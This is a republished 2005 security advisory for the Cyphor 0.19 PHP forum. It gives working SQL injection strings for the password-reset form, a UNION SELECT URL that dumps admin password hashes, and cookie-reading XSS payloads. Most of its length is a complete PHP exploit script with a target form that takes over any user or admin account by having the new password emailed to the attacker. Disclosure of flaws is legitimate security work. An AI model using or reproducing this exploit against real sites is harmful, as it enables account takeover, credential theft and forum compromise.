Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)

2005.10.11
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS) ------------------------------------------------------------------------ SUMMARY <http://www.cynox.ch/cyphor/about.php> Cyphor is "a configurable Webforum, which uses PHP4's session capabilities to authenticate users, the MySQL database system to store all its data in, and Cascading Style Sheets (CSS) to configure the "Look and Feel" of the forum. Only registered users can post messages, registered users are split up into normal users, moderators and administrators. Moderators and administrators can delete threads, administrators can change board settings, create new forums etc". Multiple security vulnerabilities have been discovered in Cyphor that allow remote attackers to cause the program to execute arbitrary SQL statement and include arbitrary HTML and/or JavaScript into pages returned to users. DETAILS Vulnerable Systems: * Cyphor version 0.19 If PHP's magic quotes have been set to off a remote attacker can trigger numerous SQL injections: SQL Injection in 'Forgot Password Interface': The "Forgot your password?" feature allows you to send yourself a new administrator password, this by supplying an SQL injecting string into the information sent to the server: email: [your_email] nick: 'or'X'='X This will trigger an email of the sorts of: You have registered for a Cyphor forum (My Discussions). This is your confirmation. Your username is: 'or'X'='X Your password is: mixa-13b Now you can go to administration panel, create/edit/delete forums/group/users, you can insert evil javascript code in terms of usage or welcome message. SQL Injection newmsg.php: To see table_prefix (usually "cyphor_") use the following request: http://[target]/cyphor/newmsg.php?fid=' You can cause the server to return the administrator password hash by using the following URL: http://[target]/[path]/newmsg.php?fid='' UNION SELECT nick, password, null, null FROM [table_prefix]users /* (it is encrypted by crypt() function with username as key, one way ... but can try to brute force it) Cross Site Scripting in newmsg.php: The following URL will trigger an cross site scripting attack against users viewing the below link: http://[target]/[path]/newmsg.php?fid='' UNION SELECT null, "< script>alert(document.cookie)< /script>", null, null/* Cross Site Scripting in footer.php: The following URL will trigger an cross site scripting attack against users viewing the below link: http://[target]/[path]/include/footer.php?t_login=< script>alert(document.cookie)< /script> Exploit: < ?php # --- cyphor019_xpl.php 7.36 08/10/2005 # # # # Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover # # # # by rgod # # site: http://rgod.altervista.org # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # send yourself any user / admin password right now! # # # # Sun Tzu: "There are five ways of attacking with fire. The first is to burn # # soldiers in their camp; the second is to burn stores; the third is to burn # # baggage trains; the fourth is to burn arsenals and magazines; the fifth is # # to hurl dropping fire amongst the opponent." # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'< html>< head>< title>Cyphor 0.19 SQL Injection/board takeover < /title>< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> < style type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img {background-color: #FFFFFF !important} input {background-color: #303030 !important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {background-color: #303030 !important} select {font-weight: normal; color: #1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline; color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;}-->< /style>< /head>< body>< p class="Stile6"> Cyphor 0.19 (possibly prior versions) SQL injection / board takeover < /p>< p class="Stile6"> a script by rgod at < a href="http://rgod.altervista.org" target="_blank"> http://rgod.altervista.org< /a>< /p> < table width="84%">< tr> < td width="43%">< form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path= value&host=value&port=value&username=value&proxy=value&your_email=value"> < p> < input type="text" name="host">< span class="Stile5"> hostname (ex: www.sitename. com)< /span>< /p>< p>< input type="text" name="path">< span class="Stile5"> path (ex: /cyphor/ or /forum/ or just /)< /span>< /p>< p>< input type="text" name="port">< span class="Stile5"> specify a port other than 80 (default value)< /span>< /p>< p>< input type="text" name="username">< span class="Stile5">user whom you want the password ,admin? ;) < /span> < /p> < p> < input type="text" name="your_email">< span class="Stile5"> email where the password will be sent< /span> < /p> < p> < input type="text" name="proxy">< span class="Stile5"> send exploit through an HTTP prox y (ip:port) < /span>< /p>< p>< input type="submit" name="Submit" value="go!">< /p> < /form>< /td>< /tr>< /table>< /body>< /html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '< table border="0">< tr>'; while ($ii < = strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "< td> < /td>"; for ($li=0; $li< =15; $li++) { echo "< td>".$headeri[$li+$ki]."< /td>"; } $ki=$ki+16; echo "< /tr>< tr>"; } if (strlen($datai)==1) {echo "< td>0".$datai."< /td>";} else {echo "< td>".$datai."< /td> ";} $ii++; $ji++; } for ($li=1; $li< =(16 - (strlen($headeri) % 16)+1); $li++) { echo "< td>&nbsp&nbsp< /td>"; } for ($li=$ci*16; $li< =strlen($headeri); $li++) { echo "< td>".$headeri[$li]."< /td>"; } echo "< /tr>< /table>"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.htmlentities($host).'...'; die; }} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...< br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } define('EMAIL_PREG', '#^[a-z0-9&\-_.\+]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+$#'); define('USER_PREG', '#^[A-Za-z0-9_\-]+$#'); if (($path< >'') and ($host< >'') and ($your_email< >'') and ($username< >'')) { if (!preg_match(EMAIL_PREG, $your_email)) {echo '< br>Need a valid email...'; die;} if (!preg_match(USER_PREG, $username)) {echo '< br>Need a valid username...'; die;} if ($port=='') {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #STEP 1 -> retrieve the table prefix... $packet="GET ".$p."show.php?fid=' HTTP/1.0 \r\n"; $packet.="User-Agent: GetRight/4.5xx\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("SELECT * FROM ",$html); $temp2=explode("forums WHERE",$temp[1]); $table_prefix=trim($temp2[0]); echo '< br> Table prefix ->'.htmlentities($table_prefix); if ($table_prefix=='') {echo 'Exploit failed...'; die;} #STEP 2 -> send yourself a new password... $sql="') UNION SELECT * FROM ".$table_prefix."users WHERE nick='".$username."'/*"; $sql=urlencode($sql); $data="email=".urlencode($your_email)."&nick=".$sql."&submit=Submit"; $packet="POST ".$p."lostpwd.php HTTP/1.1\r\n"; $packet.="Referer: http://".$host.":".$port.$path."lostpwd.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Internet Ninja x.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("New password sent.",$html)) {echo '< br>Exploit successful...check your email box...';} else {echo '< br>Exploit failed...';} } else { echo 'Fill in requested fields, optionally specify a proxy...'; } ?> ADDITIONAL INFORMATION The information has been provided by <mailto:retrogod@aliceposta.it> rgod. The original article can be found at: <http://rgod.altervista.org/cyphor019.html> http://rgod.altervista.org/cyphor019.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top